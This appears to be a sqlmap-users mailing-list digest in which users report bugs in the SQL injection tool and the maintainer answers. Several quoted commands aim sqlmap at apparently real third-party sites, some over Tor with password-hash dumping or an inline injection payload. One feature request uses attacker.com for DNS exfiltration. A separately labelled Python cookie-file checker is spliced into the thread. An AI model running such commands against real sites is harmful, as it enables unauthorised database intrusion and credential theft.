To: co...@5i... > Cc: SqlMap List <sql...@li...> > Message-ID: > <CA+...@ma...> > Content-Type: text/plain; charset="iso-8859-1" > > Hi. 
> > Thank you for your report and find it fixed with the latest commit [1]. > > Kind regards, > Miroslav Stampar > > [1] > > https://github.com/sqlmapproject/sqlmap/commit/6fed1921edf1baaf23a54fbe340ff3781fc05c86 > > > On Mon, Apr 15, 2013 at 11:01 PM, <co...@5i...> wrote: > > > Hello, > > the --host doesn't work as expected, or I am doing something wrong: > > > > > > this works as expected: > > > > ./sqlmap.py --url='http://i.csland.ro/index.php?id=0' > > > > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database > > takeover tool > > http://sqlmap.org > > > > [!] legal disclaimer: Usage of sqlmap for attacking targets without > > prior mutual consent is illegal. It is the end user's responsibility to > > obey all applicable local, state and federal laws. Developers assume no > > liability and are not responsible for any misuse or damage caused by > > this program > > > > [*] starting at 23:57:15 > > > > [23:57:15] [INFO] testing connection to the target URL > > [23:57:15] [INFO] heuristics detected web page charset 'ascii' > > [23:57:15] [INFO] testing if the target URL is stable. This can take a > > couple of seconds > > [23:57:16] [INFO] target URL is stable > > [23:57:16] [INFO] testing if GET parameter 'id' is dynamic > > [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic > > [23:57:16] [INFO] GET parameter 'id' is dynamic > > [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id' > > might be injectable (possible DBMS: 'MySQL') > > [23:57:16] [INFO] testing for SQL injection on GET parameter 'id' > > > > > > .... > > > > > > this doesn't work as expected: > > > > ./sqlmap.py --host='i.csland.ro' > > --url='http://188.240.236.15/index.php?id=0' > > > > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database > > takeover tool > > http://sqlmap.org > > > > [!] legal disclaimer: Usage of sqlmap for attacking targets without > > prior mutual consent is illegal. 
It is the end user's responsibility to > > obey all applicable local, state and federal laws. Developers assume no > > liability and are not responsible for any misuse or damage caused by > > this program > > > > [*] starting at 23:58:03 > > > > [23:58:03] [INFO] testing connection to the target URL > > [23:58:03] [CRITICAL] page not found (404) > > it is not recommended to continue in this kind of cases. Do you want to > > quit and make sure that everything is set up properly? [Y/n] > > [23:58:05] [WARNING] HTTP error codes detected during run: > > > > ............ > > > > > > Of course i.csland.ro resolves to 188.240.236.15. Any idea? > > > > Thanks. > > > > > > -- > Miroslav Stampar > http://about.me/stamparm > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 9 > Date: Tue, 16 Apr 2013 14:33:33 +0200 > From: Miroslav Stampar <mir...@gm...> > Subject: Re: [sqlmap-users] Sqlmap and direct connect error > To: ???????? ?????? <vo...@s2...> > Cc: SqlMap List <sql...@li...> > Message-ID: > <CA+9yoX0rxH+=vZuYiArFNZhK1xhwos=SNhMqEmFmnCafw-ot=g...@ma...> > Content-Type: text/plain; charset="koi8-r" > > Hi Vladimir. > > Find it "patched" with the latest commit [1]. Basically, those combinations > should not be allowed (-d and --url; -d and --tor; etc.) 
and now we've > added new option validation checks for this kind of cases. > > Kind regards, > Miroslav Stampar > > [1] > > https://github.com/sqlmapproject/sqlmap/commit/c73489aff3861f1cac7de41494a296c1095e141a > > > On Tue, Apr 16, 2013 at 12:12 AM, ???????? ?????? <vo...@s2...> wrote: > > > Hi! > > > > This bug detected if add direct param. > > > > python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u " > > http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor > > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables > > --exclude-sysdbs > > > > > > [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, > retry > > your run with the latest development version from the GitHub repository. > If > > the exception persists, please send by e-mail to ' > > sql...@li...' or open a new issue at ' > > https://github.com/sqlmapproject/sqlmap/issues/new' with the following > > text and any information required to reproduce the bug. The developers > will > > try to reproduce the bug, fix it accordingly and get back to you. 
> > sqlmap version: 1.0-dev-de99717 > > Python version: 2.7.3 > > Operating system: posix > > Command line: sqlmap.py -d > > **************************************************** -u > > http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor > > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables > > --exclude-sysdbs > > Technique: None > > Back-end DBMS: MySQL (identified) > > Traceback (most recent call last): > > File "sqlmap.py", line 87, in main > > start() > > File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in > > start > > action() > > File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in > action > > setHandler() > > File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in > > setHandler > > conf.dbmsConnector.connect() > > File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, > in > > connect > > self.connector = pymysql.connect(host=self.hostname, user=self.user, > > passwd=self.password, db=self.db, port=self.port, > > connect_timeout=conf.timeout, use_unicode=True) > > File > > > "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py", > > line 93, in Connect > > return Connection(*args, **kwargs) > > File > > > "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", > > line 584, in __init__ > > self._connect() > > File > > > "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", > > line 739, in _connect > > sock.connect((self.host, self.port)) > > File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in > > connect > > raise GeneralProxyError((5, _generalerrors[5])) > > GeneralProxyError: (5, 'bad input') > > > > > > > > > ------------------------------------------------------------------------------ > > Precog is a next-generation analytics platform capable of advanced > > analytics on semi-structured data. 
The platform includes APIs for > building > > apps and a phenomenal toolset for data science. Developers can use > > our toolset for easy data analysis & visualization. Get a free account! > > http://www2.precog.com/precogplatform/slashdotnewsletter > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > -- > Miroslav Stampar > http://about.me/stamparm > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 10 > Date: Tue, 16 Apr 2013 23:26:39 +0200 > From: buawig <bu...@gm...> > Subject: [sqlmap-users] feature request: offline mode for > --dns-domain? > To: SqlMap List <sql...@li...> > Message-ID: <516...@gm...> > Content-Type: text/plain; charset=UTF-8 > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > Hi, > > in cases where sqlmap is run against targets on internal networks it > would be great if one could tell sqlmap to simply proceed without > expecting incoming DNS requests, because sqlmap can not be executed > directly on the DNS server (which can't reach the target, but the > target can reach the DNS server). > > For me it would be enough to simply run something like > - -u ... --dns-domain=attacker.com --dns-port=0 > (--dns-port does not exist [yet]) > > to let sqlmap know that it doesn't need to start a DNS listener. > > I would then collect and decode the DNS querries on the DNS server > manually, but I could also envision running a second sqlmap instance > on the DNS server with --dns-domain (but without -u) doing that job. > > -----BEGIN PGP SIGNATURE----- > > iQIcBAEBCgAGBQJRbcIPAAoJEJeRHQyF0ukM/VwQAKlZKRyuk55ZbiOzbRPztw/p... [truncated message content] |
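Added example, not part of the original messages and not sqlmap's own code: a stand-alone checker for the Netscape cookie-file lines discussed in the --load-cookies exchange quoted above. It tests the tab-separated field count, the `domain_specified == initial_dot` condition named in the traceback, the expiry field (0 as wget writes it for session cookies), and whether the cookie domain covers the target host; the function names, finding codes and the host app.example.test are assumptions made for this example.

```python
import time


def domain_covers(host, cookie_domain):
    """True if cookie_domain (with or without a leading dot) applies to host."""
    bare = cookie_domain.lstrip(".").lower()
    host = host.lower()
    return bool(bare) and (host == bare or host.endswith("." + bare))


def check_cookie_file(text, target_host, now=None):
    """Return (line_number, code, detail) findings for a Netscape cookie file."""
    now = int(time.time()) if now is None else now
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.rstrip("\r")
        if not line.strip() or line.lstrip().startswith("#"):
            continue  # header comment or blank line
        parts = line.split("\t")
        if len(parts) != 7:
            # Typical cause: blanks were used instead of TAB characters.
            findings.append((lineno, "field-count",
                             "expected 7 tab-separated fields, got %d" % len(parts)))
            continue
        domain, dom_flag, path, secure, expires, name, value = parts
        if dom_flag not in ("TRUE", "FALSE") or secure not in ("TRUE", "FALSE"):
            findings.append((lineno, "bad-flag", "flags must be TRUE or FALSE"))
            continue
        # The condition behind the AssertionError in the quoted traceback:
        # the second field must be TRUE exactly when the domain starts with '.'.
        if (dom_flag == "TRUE") != domain.startswith("."):
            findings.append((lineno, "flag-dot-mismatch",
                             "domain %r with flag %s" % (domain, dom_flag)))
        if not expires.isdigit():
            findings.append((lineno, "bad-expiry", "expiry %r is not a UNIX time" % expires))
        elif int(expires) == 0:
            # wget --keep-session-cookies writes 0 here; a reader that takes the
            # field as a plain UNIX time sees such a cookie as already expired.
            findings.append((lineno, "session-cookie", "expiry 0 for %s" % name))
        elif int(expires) < now:
            findings.append((lineno, "expired", "%s expired at %s" % (name, expires)))
        if not domain_covers(target_host, domain):
            findings.append((lineno, "domain-mismatch",
                             "%r does not cover %r" % (domain, target_host)))
    return findings


# Constructed sample input (not taken from the thread); fields joined with real TABs.
SAMPLE = "\n".join([
    "# Netscape HTTP Cookie File",
    "\t".join(["app.example.test", "FALSE", "/", "TRUE", "0", "JSESSIONID", "AAAA"]),
    "\t".join(["app.example.test", "TRUE", "/", "TRUE", "9999999999", "JSESSIONID", "BBBB"]),
    "\t".join([".example.test", "TRUE", "/", "FALSE", "1429089794", "SRCHUSR", "x"]),
    "app.example.test FALSE / TRUE 0 JSESSIONID CCCC",
    "\t".join([".other.test", "TRUE", "/", "FALSE", "9999999999", "id", "1"]),
])

if __name__ == "__main__":
    for lineno, code, detail in check_cookie_file(SAMPLE, "app.example.test"):
        print("line %d: %-17s %s" % (lineno, code, detail))
```

Running a check like this on a cookie file before passing it to --load-cookies separates format problems from expiry and domain problems, which the thread shows being reported at different stages.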
From: Miroslav S. <mir...@gm...> - 2014-05-11 14:39:18
|
Hi Bob. Please enclose the URL part with quotes (e.g. ./sqlmap.py -u "..." ...) Kind regards, Miroslav Stampar On Sun, May 11, 2014 at 8:32 AM, Bob <sto...@qq...> wrote: > Hi friend, > > I have a problem with ! inside the URL. > > /sqlmap.py -u > http://www.xxxx.com/xxx/xxxx/default!search.do?keyword=&toUrl=http%3A%2F%2Fwww.diylooks.com%2Foem%2Fproduct%2Fdefault%21view.do%3Fid%3D270549&qty=1&input_mailbar=98%22%20OR%20%2298%22%3D%2298&input_mail=-p input_mailbar --dbms=MySQL --risk=3 --level=5 -o --param-del= > bash: !search.do?keyword=: event not found > > What should I do? > > Thanks > > bob > ------------------ > > > > > ------------------ Original ------------------ > *From: * "Miroslav Stampar";<mir...@gm...>; > *Date: * Fri, May 31, 2013 03:00 AM > *To: * "Bob"<sto...@qq...>; > *Cc: * "sqlmap-users"<sql...@li...>; > *Subject: * Re: [sqlmap-users] sqlmap-users Digest, Vol 31, Issue 1 > > Hi. > Have you been able to retrieve user names normally? I mean, were they > normally displayed in console output? > Also, is boolean technique the only one detected by sqlmap in your case > (or maybe UNION)? > Kind regards, > Miroslav Stampar > > > On Thu, May 30, 2013 at 4:57 PM, Bob <sto...@qq...> wrote: > >> Hi friend, >> >> >> Could you help me with this bug? >> >> >> [22:54:12] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your >> run with the latest development version from the GitHub repository. If the >> exception persists, please send by e-mail to ' >> sql...@li...' or open a new issue at ' >> https://github.com/sqlmapproject/sqlmap/issues/new' with the following >> text and any information required to reproduce the bug. The developers will >> try to reproduce the bug, fix it accordingly and get back to you. 
>> sqlmap version: 1.0-dev >> Python version: 2.7.3 >> Operating system: posix >> Command line: ./sqlmap -u *********************************************** >> --data=__VIEWSTATE=%2FwEPDwUJNzcyNzA5MTcxD2QWAmYPZBYCAgMPZBYCAgUPZBYCAg8PPCsAEQIADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmQBEBYAFgAWAGQYAQUaY3RsMDAkTWFpbkNvbnRlbnQkRGdSZXN1bHQPPCsADAEIZmTqSkxVHfCvk8H514IG2vidRqlanHHD7kZRl389CeOupw%3D%3D&__EVENTVALIDATION=%2FwEWCAK%2BjdvyCQLM8NjFBQKgo%2F%2FzCgKumJP3BALizcLsAwL%2Bq8zvCgKsq6%2F4DwLTytO4BPwtq4Qe7jKJMNFTIKI0vDR6PinuEV%2BLf13FWcmth6Av&ctl00%24MainContent%24TxtContCode=ZAP&ctl00%24MainContent%24TxtItemCode=ZAP&ctl00%24MainContent%24BtnFind=%E6%9F%A5%E8%AF%A2&ctl00%24MainContent%24TxtTestCustname=ZAP&ctl00%24MainContent%24TxtItemName=ZAP&ctl00%24MainContent%24TxtCheckManuCrock=ZAP&ctl00%24MainContent%24TxtCheckNo=ZAP >> -p ctl00%24MainContent%24TxtContCode -o --level 3 --risk 5 --dbms=Microsoft >> SQL Server --users --passwords >> Technique: BOOLEAN >> Back-end DBMS: Microsoft SQL Server (fingerprinted) >> Traceback (most recent call last): >> File "./sqlmap", line 87, in main >> start() >> File "/usr/share/sqlmap/lib/controller/controller.py", line 572, in start >> action() >> File "/usr/share/sqlmap/lib/controller/action.py", line 81, in action >> conf.dbmsHandler.getPasswordHashes(), "password hash", >> CONTENT_TYPE.PASSWORDS) >> File "/usr/share/sqlmap/plugins/generic/users.py", line 243, in >> getPasswordHashes >> if user in retrievedUsers: >> TypeError: unhashable type: 'list' >> >> [*] shutting down at 22:54:12 >> Thanks >> >> BOB >> >> >> ------------------ Original ------------------ >> *From: * "sqlmap-users-request"< >> sql...@li...>; >> *Date: * May 29, 2013 >> *To: * "sqlmap-users"<sql...@li...>; >> *Subject: * sqlmap-users Digest, Vol 31, Issue 1 >> >> Send sqlmap-users mailing list submissions to >> sql...@li... 
>> >> To subscribe or unsubscribe via the World Wide Web, visit >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> or, via email, send a message with subject or body 'help' to >> sql...@li... >> >> You can reach the person managing the list at >> sql...@li... >> >> When replying, please edit your Subject line so it is more specific >> than "Re: Contents of sqlmap-users digest..." >> >> >> Today's Topics: >> >> 1. Re: Feature request (David Guimaraes) >> 2. Re: --load-cookies (Dirk Wetter) >> 3. Re: --load-cookies (Miroslav Stampar) >> 4. Re: Patch for /task/<task_id>/delete in clean_filesystem >> (Miroslav Stampar) >> 5. Re: --load-cookies (Dirk Wetter) >> 6. --host parameter (co...@5i...) >> 7. Sqlmap and direct connect error (???????? ??????) >> 8. Re: --host parameter (Miroslav Stampar) >> 9. Re: Sqlmap and direct connect error (Miroslav Stampar) >> 10. feature request: offline mode for --dns-domain? (buawig) >> 11. feature request: --dns-domain for non-root users (--dns-port) >> (buawig) >> 12. Domain credentials (Brian Milliron) >> 13. Re: Domain credentials (Brandon Perry) >> 14. Re: feature request: offline mode for --dns-domain? >> (Miroslav Stampar) >> 15. Re: Domain credentials (Miroslav Stampar) >> 16. Re: feature request: fetch DNS queries from DNS server via >> HTTP (buawig) >> 17. Re: feature request: fetch DNS queries from DNS server via >> HTTP (Miroslav Stampar) >> 18. MySQL error based technique bug (Konrads Smelkovs) >> 19. Re: MySQL error based technique bug (Miroslav Stampar) >> 20. SQLmap crashing (Phillip Wylie) >> 21. Re: SQLmap crashing (Miroslav Stampar) >> 22. Custom injection payload in POST (Marcell Fodor) >> 23. Re: SQLmap crashing (Miroslav Stampar) >> 24. I got error on windows (warezhacking) >> 25. Appending to a dump (Stephen Shkardoon) >> 26. Re: Appending to a dump (Miroslav Stampar) >> 27. Re: Appending to a dump (Stephen Shkardoon) >> 28. Re: Appending to a dump (Miroslav Stampar) >> 29. --ignore-404 ? 
(buawig) >> 30. PostgreSQL: substr('string', 1, 1) vs. substring('string' >> from 1 for 1) (buawig) >> 31. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string' >> from 1 for 1) (Miroslav Stampar) >> 32. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string' >> from 1 for 1) (Miroslav Stampar) >> 33. Re: --ignore-404 ? (Miroslav Stampar) >> 34. BUG...!!!! o.O (Isai Ofir Juarez Contreras) >> 35. Re: BUG...!!!! o.O (Miroslav Stampar) >> 36. gun...@gm... wants to follow you. Accept? >> (gun...@gm...) >> 37. Direct access to mysql database (Marcell Fodor) >> 38. Re: Direct access to mysql database (Miroslav Stampar) >> 39. ? Sqlmap Users, Marco Mirandola ti ha inviato un messaggio... >> (Badoo) >> 40. Not getting any sensitive data from database (Marcell Fodor) >> 41. Re: Not getting any sensitive data from database >> (Miroslav Stampar) >> 42. unhandled exception (kvasilopoulos) >> 43. [SQLMAP] Unhandled exception for IPv6 >> (e.n...@st...) >> 44. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar) >> 45. Re: unhandled exception (Miroslav Stampar) >> 46. Passing SOAPAction in --header (Brandon Perry) >> 47. Re: Passing SOAPAction in --header (Miroslav Stampar) >> 48. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar) >> 49. Blind SQL Injection question (Guy Dufour) >> 50. Re: Blind SQL Injection question (Chris Oakley) >> 51. Re: Passing SOAPAction in --header (Brandon Perry) >> 52. Re: Passing SOAPAction in --header (Brandon Perry) >> 53. Deploy&Create SSH/tunnel with compromised MSSQL server >> (Alok Kumar) >> 54. Re: Deploy&Create SSH/tunnel with compromised MSSQL server >> (Brandon Perry) >> 55. Re: Deploy&Create SSH/tunnel with compromised MSSQL server >> (Alok Kumar) >> 56. Re: Deploy&Create SSH/tunnel with compromised MSSQL server >> (Brandon Perry) >> 57. SQLMAP Bug (Joe O'Hara) >> 58. Re: SQLMAP Bug (Miroslav Stampar) >> 59. [CRITICAL] (Thai Thao) >> 60. Re: [CRITICAL] (Miroslav Stampar) >> 61. 
Providing multiple dbms (Sebastian Nerz) >> 62. Re: Providing multiple dbms (Miroslav Stampar) >> >> >> ---------------------------------------------------------------------- >> >> Message: 1 >> Date: Sat, 13 Apr 2013 21:40:39 -0300 >> From: David Guimaraes <sk...@gm...> >> Subject: Re: [sqlmap-users] Feature request >> To: Miroslav Stampar <mir...@gm...> >> Cc: SqlMap List <sql...@li...> >> Message-ID: >> <CAJ...@ma...> >> Content-Type: text/plain; charset="iso-8859-1" >> >> Good question Miroslav.. I tried to think in something that can be >> implemented without ruin sqlmap query schema, but I could not come to any >> conclusion... =( >> >> The thing is, sqlsus use a different approch to dump the data, making this >> kind of thing possible... >> >> The solution that I found in this particular scenario is to use sqlsus, >> unfortunately... >> >> Regards. >> >> David >> >> >> On Mon, Apr 1, 2013 at 6:35 PM, Miroslav Stampar < >> mir...@gm... >> > wrote: >> >> > Hi David. >> > >> > And what do you recommend to be done in case of query with length > >> > max_inj_length? >> > >> > Kind regards, >> > Miroslav Stampar >> > On Apr 1, 2013 11:14 PM, "David Guimaraes" <sk...@gm...> wrote: >> > >> >> Hi, I am trying to perform sql injection on a web site but I can not >> get >> >> successful due to a size limitation on the query sent to the server. >> The >> >> server is limiting the size of query in 512 bytes only and sqlmap do >> not >> >> have any customization that allows me to bypass this restriction like >> >> sqlsus "max_inj_length" parameter. Sqlsus has a feature called >> "autoconf" >> >> that measure the permited query size. >> >> >> >> There is some chance to put this kind of feature in sqlmap? >> >> >> >> Thanks. 
>> >>
>> >> --
>> >> David Gomes Guimarães
>> >>
>> >> ------------------------------------------------------------------------------
>> >> Own the Future-Intel® Level Up Game Demo Contest 2013
>> >> Rise to greatness in Intel's independent game demo contest.
>> >> Compete for recognition, cash, and the chance to get your game
>> >> on Steam. $5K grand prize plus 10 genre and skill prizes.
>> >> Submit your demo by 6/6/13. http://p.sf.net/sfu/intel_levelupd2d
>> >> _______________________________________________
>> >> sqlmap-users mailing list
>> >> sql...@li...
>> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >>
>>
>> --
>> David Gomes Guimarães
>> -------------- next part --------------
>> An HTML attachment was scrubbed...
>>
>> ------------------------------
>>
>> Message: 2
>> Date: Mon, 15 Apr 2013 11:36:37 +0200
>> From: Dirk Wetter <sp...@dr...>
>> Subject: Re: [sqlmap-users] --load-cookies
>> To: Miroslav Stampar <mir...@gm...>
>> Cc: SqlMap List <sql...@li...>
>> Message-ID: <516...@dr...>
>> Content-Type: text/plain; charset=ISO-8859-1
>>
>> On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
>> > Nevertheless, with the latest commit that check should be "neutralized" now. Could you please retry it now?
>>
>> thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib
>> hiccups, using the same file:
>>
>> /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
>> Traceback (most recent call last):
>>   File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in _really_load
>>     assert domain_specified == initial_dot
>> AssertionError
>>
>>   _warn_unhandled_exception()
>> [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1': '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>>
>> the 999.. looks strange to me.
>>
>> >
>> > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <mir...@gm...> wrote:
>> >
>> > Hi Dirk.
>> >
>> > Well, I would say that you have an expired cookie. Do you see that value 0? That value should be a valid UNIX time representing time of cookie expiration. Also, I've just tested that cookie of yours and sqlmap says: "[WARNING] cookie '....' has expired"
>> >
>>
>> that's true but IMO 0 represents just a session cookie. Example:
>>
>> prompt% wget -q -O /dev/null --keep-session-cookies --save-cookies=/dev/stdout bing.com
>> # HTTP cookie file.
>> # Generated by Wget on 2013-04-15 11:23:13.
>> # Edit at your own risk.
>>
>> .bing.com TRUE / FALSE 1429089794 SRCHUSR AUTOREDIR=0&GEOVAR=&DOB=20130415
>> .bing.com TRUE / FALSE 1429089794 SRCHD D=2781203&MS=2781203&AF=NOFORM
>> .bing.com TRUE / FALSE 1429089794 OrigMUID 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
>> .bing.com TRUE / FALSE 1429089794 MUID 333995A69E06630B2EB491169F016314
>> .bing.com TRUE / FALSE 0 _SS SID=B954CB7EDF8643CABAD8013F27A241E7
>> .bing.com TRUE / FALSE 0 _HOP
>> .bing.com TRUE / FALSE 0 _FS NU=1
>> .bing.com TRUE / FALSE 1429089794 _FP EM=1
>> www.bing.com FALSE / FALSE 1429089794 SRCHUID V=2&GUID=975091780DFF407DA9DD07139FD97C4D
>> www.bing.com FALSE / FALSE 1429089794 MUIDB 333995A69E06630B2EB491169F016314
>>
>> prompt%
>>
>> Same parser problem btw if I edit the cookie file and put 1429089794 unix
>> time instead of 0 in there.
>>
>> Ok: With the prev rev ed5599f it reads this file ok (no session cookies
>> but cookies w/ expiration date) and uses the last
>> cookie only for the first 120 tries.
>>
>> Cheers, Dirk
>>
>> >
>> > Kind regards,
>> > Miroslav Stampar
>> >
>> > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...> wrote:
>> >
>> > Hi Miroslav,
>> >
>> > thx for your prompt answer.
>> >
>> > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>> > > Hi Dirk.
>> > >
>> > > Could you please get the latest revision and retry it again?
>> > ed5599f: almost the same: with cookie in the header sqlmap takes only this one.
>> > The slight difference seems to be that in the case where I didn't supply a cookie
>> > sqlmap doesn't use any cookie at all, i.e. now not the one from the server anymore.
>> > >
>> > > There was a situation where info messages have been wrongly written that original response contained Set-Cookie in situations like yours.
>> > >
>> > > In case that everything stays as it is, I'll need to ask you to provide more details. For example, cookie file would be great.
>> >
>> > sure, here you go:
>> >
>> > --snip
>> > # Netscape HTTP Cookie File
>> > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie>
>> > [..]
>> > --snap
>> >
>> > They are all session cookies. For easier reading here I put some blanks in the line
>> > above, in "cookie-file" there aren't any though. Cookies were generated with
>> > stompy and a shell script (looks the same as with
>> > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file> <URL>)
>> >
>> > Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
>> >
>> > >
>> > > Also, please make sure that the cookie file contains proper cookie(s) - domain name should be the same as a domain of target, cookie needs to have a proper valid time, etc.
>> >
>> > see above.
>> >
>> > Cheers,
>> >
>> > Dirk
>> >
>> > >
>> > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr...> wrote:
>> > >
>> > > Hi Miroslav,
>> > >
>> > > yes unfortunately.
>> > >
>> > > If I omit the cookie line in the request header completely, sqlmap
>> > > seems to take the first cookie issued by the server with set-cookie (and
>> > > puts it silently in).
>> > >
>> > > Cheers,
>> > >
>> > > Dirk
>> > >
>> > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
>> > > > Hi.
>> > > >
>> > > > And this is also happening if you are skipping "Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
>> > > >
>> > > > Kind regards,
>> > > > Miroslav Stampar
>> > > >
>> > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr...> wrote:
>> > > >
>> > > > Hi folks,
>> > > >
>> > > > .... that doesn't work for me. It always uses the cookie supplied
>> > > > (below in $REQUEST, or if I omit the line in $REQUEST the one
>> > > > from the 1st server reply is being used)
>> > > >
>> > > > So what is wrong in here:
>> > > >
>> > > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>> > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
>> > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
>> > > > --level=2 --risk=2 -r $REQUEST
>> > > >
>> > > > The content of the file $REQUEST is:
>> > > >
>> > > > POST <URL> HTTP/1.1
>> > > > Host: <HOST>
>> > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko)
>> > > > Chrome/0.2.149.6 Safari/525.13
>> > > > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>> > > > Accept-Language: en-US,en;q=0.5
>> > > > Accept-Encoding: gzip, deflate
>> > > > Referer: <Referer>
>> > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>> > > > Connection: keep-alive
>> > > > Content-Type: application/x-www-form-urlencoded
>> > > > Content-Length: 67
>> > > >
>> > > > <abunchofpostparams>
>> > > >
>> > > > No hints that cookie-file is not in correct format (I've been through this,
>> > > > at least I think so ;) ).
>> > > >
>> > > > Any insight would be much appreciated.
>> > > >
>> > > > Cheers,
>> > > >
>> > > > Dirk
>> > > >
>> > > > ------------------------------------------------------------------------------
>> > > > Precog is a next-generation analytics platform capable of advanced
>> > > > analytics on semi-structured data. The platform includes APIs for building
>> > > > apps and a phenomenal toolset for data science. Developers can use
>> > > > our toolset for easy data analysis & visualization. Get a free account!
>> > > > http://www2.precog.com/precogplatform/slashdotnewsletter
>> > > > _______________________________________________
>> > > > sqlmap-users mailing list
>> > > > sql...@li...
>> > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> > > >
>> > > > --
>> > > > Miroslav Stampar
>> > > > http://about.me/stamparm
>> > >
>> > > --
>> > > Miroslav Stampar
>> > > http://about.me/stamparm
>> >
>> > --
>> > Miroslav Stampar
>> > http://about.me/stamparm
>> >
>> > --
>> > Miroslav Stampar
>> > http://about.me/stamparm
>>
>> ------------------------------
>>
>> Message: 3
>> Date: Mon, 15 Apr 2013 11:45:19 +0200
>> From: Miroslav Stampar <mir...@gm...>
>> Subject: Re: [sqlmap-users] --load-cookies
>> To: Dirk Wetter <sp...@dr...>
>> Cc: SqlMap List <sql...@li...>
>> Message-ID: <CA+9yoX0yAGFkCiLuycVqdbm8jvnMeEPgJdXoYZi_4NTW-YQo=Q...@ma...>
>> Content-Type: text/plain; charset="iso-8859-1"
>>
>> Hi Dirk.
>>
>> Now that crash should be "patched".
>>
>> Could you please retry it now and say if the latest revision suits your
>> needs?
>>
>> Kind regards,
>> Miroslav Stampar
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>> -------------- next part --------------
>> An HTML attachment was scrubbed...
>>
>> ------------------------------
>>
>> Message: 4
>> Date: Mon, 15 Apr 2013 11:46:21 +0200
>> From: Miroslav Stampar <mir...@gm...>
>> Subject: Re: [sqlmap-users] Patch for /task/<task_id>/delete in clean_filesystem
>> To: Brandon Perry <bpe...@gm...>
>> Cc: sqlmap users <sql...@li...>
>> Message-ID: <CA+9yoX3RNQDm=PqT...@ma...>
>> Content-Type: text/plain; charset="iso-8859-1"
>>
>> Hi Brandon.
>>
>> Thank you for your patch and find it now included [1].
>>
>> Kind regards,
>> Miroslav Stampar
>>
>> [1] https://github.com/sqlmapproject/sqlmap/commit/8853e43616e89f26cfd6d1c1540e02ed6b4ca224
>>
>> On Sat, Apr 13, 2013 at 8:36 PM, Brandon Perry <bpe...@gm...
>> >wrote:
>>
>> > Hi, the attached patch fixes an issue with the /task/<task_id>/delete api
>> > call when self.output_directory is NoneType and clean_system() is called.
>> >
>> > --
>> > http://volatile-minds.blogspot.com -- blog
>> > http://www.volatileminds.net -- website
>> >
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>> -------------- next part --------------
>> An HTML attachment was scrubbed...
>>
>> ------------------------------
>>
>> Message: 5
>> Date: Mon, 15 Apr 2013 12:19:13 +0200
>> From: Dirk Wetter <sp...@dr...>
>> Subject: Re: [sqlmap-users] --load-cookies
>> To: Miroslav Stampar <mir...@gm...>
>> Cc: SqlMap List <sql...@li...>
>> Message-ID: <516...@dr...>
>> Content-Type: text/plain; charset=ISO-8859-1
>>
>> Hi Miroslav,
>>
